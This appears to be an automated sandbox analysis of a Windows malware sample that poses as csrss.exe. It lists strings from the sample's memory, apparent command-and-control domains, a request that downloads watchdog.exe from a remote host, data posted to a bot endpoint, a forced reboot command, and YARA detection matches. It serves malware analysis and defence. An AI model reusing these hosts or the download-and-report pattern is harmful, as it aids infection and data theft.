            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Nov 2021 00:57:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11CF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bKtxxp476cwRWpL7PMsiOEiUQCqwyb3bZEaJ0AAlC%2FT9jGwQdvS7Se%2BfmHEOErvcAP%2B4zdZUYVGNLmzkEYvbf2eQj3YtbAsdfhB5eIGhFyxOPCEF4oO6j5HX%2FobEjzLNcm0pI2mw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6ac39101ef046927-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Nov 2021 00:57:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=gv8mampiuh95qf18cj0go9m89u; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RBPQOW%2BDKJcfajEWjUAp5sEAC%2F%2FnnEUjdXStK%2Byc0Yn65mfutwtYjwiIq%2BUlGvNK0I8GjSutN%2BRWb2fq4knditxLDLYpwlGC1tM5sB3%2F2PrElhih1ODR82MTA1P9qvUN7SYUkd8C"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6ac39121ec73701b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Nov 2021 00:58:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=4ujbsd6crmkskigbel52akbion; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ryIHSGUMxFPJ%2F1e4qghNO%2FLH6YHJuD1QQg3lP1u0%2BXF1eYpABsushydm506ZkuU1RkdCCxRbUIoxtS3RvmeD7XMScKD9Nd4FY3%2Bt%2Fz7lrD9OZ3nlNfnYz5B0JVNarhQrNImsp3fS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6ac392db8b07f407-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
            Source: csrss.exeString found in binary or memory: .30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: received unexpected handshake message of type %T when waiting for %TBlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103Mozilla/5.0 (Windows NT equals www.facebook.com (Facebook)
            Source: csrss.exeString found in binary or memory: lla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916260026308143510066 equals www.facebook.com (Facebook)
            Source: csrss.exeString found in binary or memory: http://archive.org/details/archive.org_bot)Mozilla/5.0
            Source: csrss.exeString found in binary or memory: http://builtwith.com/biup)
            Source: 4t4y4r89UZ.exe, 00000000.00000002.293844995.0000000004C28000.00000040.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.320126645.0000000004BB5000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.553003907.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.364381433.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.393120243.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000022.00000002.387543295.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmpString found in binary or memory: http://crl.g
            Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.554614867.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.365686923.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.391872989.00000000009F9000.00000040.00020000.sdmp, csrss.exe, 00000022.00000002.380920089.00000000009F9000.00000040.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
            Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.554614867.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.365686923.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.391872989.00000000009F9000.00000040.00020000.sdmp, csrss.exe, 00000022.00000002.380920089.00000000009F9000.00000040.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
            Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.554614867.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.365686923.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.391872989.00000000009F9000.00000040.00020000.sdmp, csrss.exe, 00000022.00000002.380920089.00000000009F9000.00000040.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
            Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpString found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
            Source: csrss.exeString found in binary or memory: http://gais.cs.ccu.edu.tw/robot.php)Gulper
            Source: csrss.exe, 0000000E.00000003.380180308.000000001688A000.00000004.00000001.sdmpString found in binary or memory: http://gohnot.com/61c75dbee3f325b4d87cddaf5bae3393
            Source: csrss.exe, 0000000E.00000003.376871175.0000000016B3E000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.378698151.000000001697C000.00000004.00000001.sdmpString found in binary or memory: http://gohnot.com/61c75dbee3f325b4d87cddaf5bae3393/watchdog.exe
            Source: csrss.exeString found in binary or memory: http://grub.org)Mozilla/5.0
            Source: csrss.exeString found in binary or memory: http://help.ya
            Source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmpString found in binary or memory: http://https://_bad_pdb_file.pdb
            Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpString found in binary or memory: http://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna:
            Source: csrss.exeString found in binary or memory: http://misc.yahoo.com.cn/he
            Source: csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://newscommer.com/app/app.exe
            Source: csrss.exeString found in binary or memory: http://search.msn.com/msnb
            Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
            Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
            Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
            Source: csrss.exeString found in binary or memory: http://www.alexa.com/help/webmasters;
            Source: csrss.exeString found in binary or memory: http://www.archive.org/details/archive.org_bot)Opera/9.80
            Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpString found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
            Source: csrss.exeString found in binary or memory: http://www.baidu.com/search/spide
            Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpString found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
            Source: svchost.exe, 00000005.00000002.309019102.0000029B1CA13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.comsv
            Source: csrss.exeString found in binary or memory: http://www.bloglines.com)F
            Source: csrss.exeString found in binary or memory: http://www.everyfeed.c
            Source: csrss.exeString found in binary or memory: http://www.exabot.com/go/robot)Opera/9.80
            Source: csrss.exeString found in binary or memory: http://www.google.com/adsbot.html)Encountered
            Source: csrss.exeString found in binary or memory: http://www.google.com/bot.html)Mozilla/5.0
            Source: csrss.exeString found in binary or memory: http://www.google.com/bot.html)tls:
            Source: csrss.exeString found in binary or memory: http://www.google.com/feedfetcher.html)HKLM
            Source: csrss.exeString found in binary or memory: http://www.googlebot.com/bot.html)Links
            Source: csrss.exeString found in binary or memory: http://www.spidersoft.com)Wget/1.9
            Source: csrss.exeString found in binary or memory: http://yandex.com/bots)Opera/9.51
            Source: csrss.exeString found in binary or memory: http://yandex.com/bots)Opera/9.80
            Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
            Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
            Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
            Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.comr
            Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
            Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpString found in binary or memory: https://blockchain.infoindex
            Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
            Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
            Source: svchost.exe, 00000005.00000003.307756763.0000029B1CA5E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
            Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
            Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
            Source: svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
            Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
            Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
            Source: svchost.exe, 00000005.00000003.307813476.0000029B1CA47000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
            Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
            Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
            Source: svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
            Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
            Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
            Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
            Source: svchost.exe, 00000005.00000003.307846418.0000029B1CA41000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
            Source: svchost.exe, 00000005.00000003.307846418.0000029B1CA41000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
            Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
            Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
            Source: svchost.exe, 00000005.00000003.307756763.0000029B1CA5E000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
            Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
            Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
            Source: svchost.exe, 00000005.00000003.307813476.0000029B1CA47000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.307846418.0000029B1CA41000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
            Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
            Source: svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
            Source: svchost.exe, 00000005.00000003.286135165.0000029B1CA32000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
            Source: csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmpString found in binary or memory: https://logs.trumops.com
            Source: csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmpString found in binary or memory: https://logs.trumops.comhttps://runmodes.com/api/loghttps://server8.trumops.comC:
            Source: csrss.exeString found in binary or memory: https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:
            Source: 4t4y4r89UZ.exe, 00000000.00000002.299163430.0000000015CC4000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.327559047.00000000160BC000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.377353014.0000000016810000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397681987.000000001680E000.00000004.00000001.sdmp, csrss.exe, 00000022.00000002.391603610.0000000016810000.00000004.00000001.sdmpString found in binary or memory: https://retoti.com
            Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpString found in binary or memory: https://retoti.comidentifier
            Source: csrss.exe, 0000000E.00000002.557421639.00000000168DE000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmpString found in binary or memory: https://runmodes.com/api/log
            Source: csrss.exe, 0000000E.00000002.557421639.00000000168DE000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.558065286.0000000016974000.00000004.00000001.sdmpString found in binary or memory: https://server8.trumops.com
            Source: csrss.exe, 0000000E.00000003.379435337.00000000168F0000.00000004.00000001.sdmpString found in binary or memory: https://server8.trumops.com/api/cdn?c=3e3f6b9a36a75d40&uuid=f7873597-7b36-4441-9416-097456f134ae
            Source: csrss.exe, 0000000E.00000002.556753831.0000000016861000.00000004.00000001.sdmpString found in binary or memory: https://server8.trumops.com/api/pollf
            Source: csrss.exe, 0000000E.00000002.558133841.00000000169C0000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.378575314.00000000169C0000.00000004.00000001.sdmpString found in binary or memory: https://server8.trumops.com/bots/post-ia-data?uuid=f7873597-7b36-4441-9416-097456f134ae
            Source: csrss.exe, 0000000E.00000002.558447548.0000000016AC4000.00000004.00000001.sdmpString found in binary or memory: https://server8.trumops.comc=3e3f6b9a36a75d40&uuid=server8.trumops.com:443server8.trumops.com:443tcp
            Source: csrss.exe, 0000000E.00000003.378367742.00000000169DE000.00000004.00000001.sdmpString found in binary or memory: https://server8.trumops.comserver8.trumops.com:443server8.trumops.com:443tcpserver8.trumops.com
            Source: csrss.exe, 0000000E.00000003.378367742.00000000169DE000.00000004.00000001.sdmpString found in binary or memory: https://server8.trumops.comserver8.trumops.com:443server8.trumops.com:443tcpserver8.trumops.comws2_3
            Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpString found in binary or memory: https://sitescore.aiValue
            Source: svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
            Source: svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.309019102.0000029B1CA13000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
            Source: svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
            Source: svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
            Source: svchost.exe, 00000005.00000003.286135165.0000029B1CA32000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
            Source: svchost.exe, 00000005.00000003.286135165.0000029B1CA32000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
            Source: svchost.exe, 00000005.00000003.307813476.0000029B1CA47000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
            Source: csrss.exe, 0000000E.00000002.556988618.0000000016892000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.557380093.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.377353014.0000000016810000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397681987.000000001680E000.00000004.00000001.sdmp, csrss.exe, 00000022.00000002.391603610.0000000016810000.00000004.00000001.sdmpString found in binary or memory: https://trumops.com
            Source: csrss.exeString found in binary or memory: https://trumops.com/api/install-failureinvalid
            Source: 4t4y4r89UZ.exe, 00000000.00000002.299142381.0000000015CBA000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS
            Source: csrss.exe, 0000000E.00000002.557380093.00000000168D6000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.com
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327559047.00000000160BC000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.377353014.0000000016810000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397681987.000000001680E000.00000004.00000001.sdmp, csrss.exe, 00000022.00000002.391603610.0000000016810000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMic
            Source: 4t4y4r89UZ.exe, 00000000.00000002.299163430.0000000015CC4000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta
            Source: csrss.exe, 00000010.00000002.377377894.0000000016814000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397738853.0000000016814000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-212556
            Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comif-unmodified-sinceillegal
            Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpString found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)gentraceback
            Source: unknownHTTP traffic detected: POST /api/log HTTP/1.1Host: runmodes.comUser-Agent: Go-http-client/1.1Content-Length: 144Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip
            Source: unknownDNS traffic detected: queries for: trumops.com
            Source: global trafficHTTP traffic detected: GET /api/cdn?c=3e3f6b9a36a75d40&uuid=f7873597-7b36-4441-9416-097456f134ae HTTP/1.1Host: server8.trumops.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
            Source: global trafficHTTP traffic detected: GET /61c75dbee3f325b4d87cddaf5bae3393/watchdog.exe HTTP/1.1Host: gohnot.comUser-Agent: Go-http-client/1.1Uuid: f7873597-7b36-4441-9416-097456f134aeVersion: 183Accept-Encoding: gzip

            System Summary:

            barindex
            Uses shutdown.exe to shutdown or reboot the systemShow sources
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
            Source: 4t4y4r89UZ.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 0.2.4t4y4r89UZ.exe.9a56e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 23.2.csrss.exe.9ab080.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 23.3.csrss.exe.65540e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 14.3.csrss.exe.655bce0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 10.2.4t4y4r89UZ.exe.9ad2e0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 50.2.csrss.exe.5ca4f30.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 0.2.4t4y4r89UZ.exe.9ad2e0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 10.3.4t4y4r89UZ.exe.5e2bce0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 16.2.csrss.exe.9ab080.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 16.3.csrss.exe.65540e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 34.2.csrss.exe.9ab080.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 42.3.csrss.exe.655bce0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
